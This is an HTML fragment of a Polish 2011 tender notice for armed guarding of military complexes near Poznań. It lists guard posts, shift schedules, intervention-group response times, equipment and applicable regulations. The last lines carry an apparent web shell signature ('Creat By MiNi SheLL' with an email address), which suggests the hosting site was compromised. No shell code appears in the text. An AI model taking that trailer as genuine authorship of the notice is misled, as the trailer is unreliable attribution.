<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona bezpośrednia kompleksu wojskowego 8637 Biedrusko wchodzącego w skład  JW 2209 z bronią palną długą gwintowaną. Realizowana w oparciu o dwa posterunki wartownicze: po przez ochronę, obserwację i patrolowanie kompleksu. Wspomagane przez grupę interwencyjną wyposażoną w broń palną, hełmy, kamizelki kuloodporne,  która przybędzie i podejmie się czynnego działania bezzwłocznie po uzyskaniu sygnału o zagrożeniu na obiekcie jednak nie później niż 12 minut od powiadomienia. Powiadomienie grupy interwencyjnej o sytuacjach kryzysowych realizować drogą radiową;

- Patrole interwencyjne i doraźne. Patrol wystawiany ze składu SUFO w sytuacjach kryzysowych (zadziałanie sygnalizacji alarmowej, naruszenia systemu ochrony itp.),
- Ochrona obiektu realizowana będzie zgodnie z Instrukcją o ochronie obiektów wojskowych Sygn. OIN  3 2008, 
- Ochrona obiektów wojskowych poradnik sygn. OIN 4 2009; 
Rozporządzeniem Ministra Obrony Narodowej z dnia 21 czerwca 2007 r. Dz.U.2007.126.876 z późniejszymi zmianami, Rozporządzenie ministra obrony narodowej z dnia 19 czerwca 1999 r. W sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organi?zacyjnych resortu obrony narodowej późniejszymi zmianami; Rozporządzenie Rady Ministrów z dnia 19.06.1999 w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i  jednostek organizacyjnych resortu obrony narodowej oraz opisem zamówienia.
Posterunek nr 1 - brama wjazdowa i teren strefy  A  posterunek zewnętrzny, ochronny, trzyzmienny ruchomy - 24 godzinny - szczegółowe zadania zostaną określone w Instrukcji ochrony obiektu - tabela posterunku; 
Posterunek nr 2 -  rejon strefy B posterunek zewnętrzny, ochronny, dwuzmienny ruchomy - 12 godzinny, w dni wolne i świąteczne trzyzmienny ruchomy (24 godziny)  szczegółowe zadania zostaną określone w Instrukcji ochrony obiektu  - tabela posterunku;   
INNE WYMAGANIA WYNIKAJĄCE ZE SPECYFIKI ZADANIA
-  ochrona kompleksu wykonywana jest przez osoby umundurowane, wyposażone w zabezpieczenie osobiste 
( kamizelki kuloodporne, hełmy, przyciski napadowe i środki łączności);
- wykonawca jest zobowiązany do zabezpieczenia przechowywanej broni amunicji na wartowni;
  - zabezpieczenie ciągłej łączności radiowej z kierownikiem obiektu, siedzibą wykonawcy i grupą interwencyjną wystawianą przez wykonawcę; 
- znajomość obsługi i posługiwania się komputerem , centralami alarmowymi przez dowódców wart;
- wykonawca zobowiązany jest do kontroli służby przez grupę interwencyjną raz na dobę w godzinach nocnych, fakt ten należy odnotować w dokumentach służby dyżurnej;
- minimalna ilość pracowników przewidywana do realizacji zadań związanych z ochroną posterunków 1 i 2 wynosi siedem osób (w tym dowódca warty) razem 7 osób;
- opracowanie z Zamawiającym Instrukcji ochrony obiektu po podpisaniu umowy zgodnej z obowiązującymi rozporządzeniami Rady Ministrów i Ministra Obrony Narodowej;
- wzmocnienie ochrony posterunków w wyższych stanach gotowości bojowej i sytuacjach kryzysowych  przez grupę interwencyjną wyposażoną jak wartownicy na posterunkach w czasie przez 48 godzin po ogłoszeniu gotowości do podjęcia działań  i zarządzeń kryzysowych;  
- przestrzeganie postępowań zawartych w Instrukcji Bezpieczeństwa Przemysłowego stanowiącej Załącznik nr 1 do umowy
Zamawiający nie dopuszcza składania ofert wariantowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> świadczenie usług związanych z ochroną kompleksu wojskowego 5470 w m. Trzaskowo k Murowanej Gośliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona bezpośrednia kompleksu wojskowego 5470  tj. JW 2209 Trzaskowo k Murowanej Gośliny z bronią palną długą gwintowaną. Realizowana w oparciu o dwa posterunki wartownicze: po przez ochronę, obserwację i patrolowanie kompleksu. Wspomagane przez grupę interwencyjną wyposażoną w broń palną, hełmy, kamizelki kuloodporne, która przybędzie i podejmie się czynnego działania bezzwłocznie po uzyskaniu sygnału o zagrożeniu na obiekcie jednak nie później niż 17 minut od powiadomienia. Powiadomienie grupy interwencyjnej o sytuacjach kryzysowych realizować drogą radiową;

- Patrole interwencyjne i doraźne. Patrol wystawiany ze składu SUFO w sytuacjach kryzysowych (zadziałanie sygnalizacji alarmowej, naruszenia systemu ochrony itp.),
- Ochrona obiektu realizowana będzie zgodnie z Instrukcją o ochronie obiektów wojskowych Sygn. OIN  3 2008, 
- Ochrona obiektów wojskowych poradnik sygn. OIN 4 2009; 
Rozporządzeniem Ministra Obrony Narodowej z dnia 21 czerwca 2007 r. Dz.U.2007.126.876 z późniejszymi zmianami, Rozporządzenie ministra obrony narodowej z dnia 19 czerwca 1999 r. W sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organi?zacyjnych resortu obrony narodowej późniejszymi zmianami; Rozporządzenie Rady Ministrów z dnia 19.06.1999 w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i  jednostek organizacyjnych resortu obrony narodowej oraz opisem zamówienia.

Posterunek nr 1 - brama wjazdowa i teren strefy A , posterunek zewnętrzny, ochronny, trzyzmienny ruchomy - 24 godzinny - szczegółowe zadania zostaną określone w Instrukcji ochrony obiektu - tabela posterunku; 
Posterunek nr 2 - rejon strefy B posterunek zewnętrzny, ochronny, dwuzmienny ruchomy - 14 godzinny, w dni wolne i świąteczne trzyzmienny ruchomy (24 godziny)  szczegółowe zadania zostaną określone w Instrukcji ochrony obiektu - tabela posterunku;   
INNE WYMAGANIA WYNIKAJĄCE ZE SPECYFIKI ZADANIA
-  ochrona kompleksu wykonywana jest przez osoby umundurowane, wyposażone w zabezpieczenie osobiste 
( kamizelki kuloodporne, hełmy, przyciski napadowe i środki łączności);
- wykonawca jest zobowiązany do zabezpieczenia przechowywanej broni amunicji na wartowni;
  - zabezpieczenie ciągłej łączności radiowej z kierownikiem obiektu, siedzibą wykonawcy i grupą interwencyjną wystawianą przez wykonawcę; 
- znajomość obsługi i posługiwania się komputerem , centralami alarmowymi przez dowódców wart;
- wykonawca zobowiązany jest do kontroli służby przez grupę interwencyjną raz na dobę w godzinach nocnych, fakt ten należy odnotować w dokumentach służby dyżurnej;
- minimalna ilość pracowników przewidywana do realizacji zadań związanych z ochroną posterunków 1 i 2 wynosi siedem osób (w tym dowódca warty) razem 7 osób;
- opracowanie z Zamawiającym Instrukcji ochrony obiektu po podpisaniu umowy zgodnej z obowiązującymi rozporządzeniami Rady Ministrów i Ministra Obrony Narodowej;
- wzmocnienie ochrony posterunków w wyższych stanach gotowości bojowej i sytuacjach kryzysowych  przez grupę interwencyjną wyposażoną jak wartownicy na posterunkach w czasie przez 48 godzin po ogłoszeniu gotowości do podjęcia działań  i zarządzeń kryzysowych;  
- przestrzeganie postępowań zawartych w Instrukcji Bezpieczeństwa Przemysłowego stanowiącej Załącznik nr 1 do umowy.
Zamawiający nie dopuszcza składania ofert wariantowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> świadczenie usług związanych z ochroną  kompleksu 2746 - Pływalni przy ul. Dąbrowskiego 252 w Poznaniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest ochrona fizyczna obiektu wojskowego kompleks 2746  - ochronę fizyczną pływalni należy realizować w godzinach nocnych w dni powszednie tj. od 22 00 - do  600 , oraz całodobowo w dni wolne i świąteczne - tj. w sobotę od godziny 14 00 do poniedziałku do godziny 600 , oraz niżej wymienione soboty i święta w 2011 roku tj. 01 - 02.01; 06.01; 25.04; 02 - 03.05; 23.06; 15. 08;  31.10; 01. 11; 11 - 12. 11;   07; 24, 26, 31. 12; oraz w  okresie urlopowym od piątku w godzinach 1500 do poniedziałku do godzinny  600 w dniach: 01- 04; 08 - 11; 15 - 18; 22 - 25; 29 - 01. 07, 05 - 08;  12 - 16; 18 - 22; 25 - 30. 08 przez specjalistyczną uzbrojoną formacje. 
1. Przyjęcie obiektu pod ochronę realizować należy na 30 min. przed rozpoczęciem służby; przekazanie obiektu spod ochrony osobom upoważnionym przeprowadzać należy do 30 min. po zakończeniu zadania. 
2. Ochrona kompleksu 2746 wykonywana jest przez osoby umundurowane. wyposażone w zabezpieczenie osobiste 
3. Patrolowanie rejonu wokół pływalni przez pracownika ochrony minimum  cztery razy w trakcie służby z jednoczesną rejestracją (czytnik czasu pracy) i przekazaniem wydruków do siedziby zamawiającego co dwa tygodnie.
4. W przypadku zagrożenia obiektu, ochrona powinna być wspomagana przez grupę interwencyjną wyposażoną w broń palną, hełmy, kamizelki kuloodporne,  która przybędzie i podejmie się czynnego działania bezzwłocznie po uzyskaniu sygnału o zagrożeniu na obiekcie jednak nie później niż 7 minut od powiadomienia. Powiadomienie grupy interwencyjnej o sytuacjach kryzysowych realizować drogą radiową;
5.  Zabezpieczenie ciągłej łączności radiowej z kierownikiem obiektu, siedzibą wykonawcy i grupą interwencyjną wystawianą przez wykonawcę; 
6.  Szczegółowe zadania i obowiązki służby ochrony i grupy interwencyjnej zostaną określone w instrukcji ochrony obiektu, która zostanie opracowana po podpisaniu umowy przez zamawiającego i wykonawcę. 
7.  Wykonawca zobowiązany jest do kontroli służby przez grupę interwencyjną raz na dobę w godzinach nocnych, fakt ten należy odnotować w dokumentach służby dyżurnej;
8.  Minimalna ilość pracowników przewidywana do realizacji zamówienia wynosi - jedna osoba w trakcie realizacji zadania;
9.  Przestrzeganie postępowań zawartych w Instrukcji Bezpieczeństwa Przemysłowego stanowiącej Załącznik nr 1 do umowy.
Przedsięwzięcie należy realizować w oparciu o dokumenty normatywne obowiązujące w Siłach Zbrojnych RP tj. Instrukcji o ochronie obiektów wojskowych Sygn. OIN  3 2008, 
-  Ochrona obiektów wojskowych poradnik sygn. OIN 4 2009;
Rozporządzeniem Ministra Obrony Narodowej z dnia 21 czerwca 2007 r. Dz.U.2007.126.876 z późniejszymi zmianami, Rozporządzenie ministra obrony narodowej z dnia 19 czerwca 1999 r. W sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organi?zacyjnych resortu obrony narodowej późniejszymi zmianami; Rozporządzenie Rady Ministrów z dnia 19.06.1999 w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i  jednostek organizacyjnych resortu obrony narodowej opisem zamówienia.
Zamawiający nie dopuszcza składania ofert wariantowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com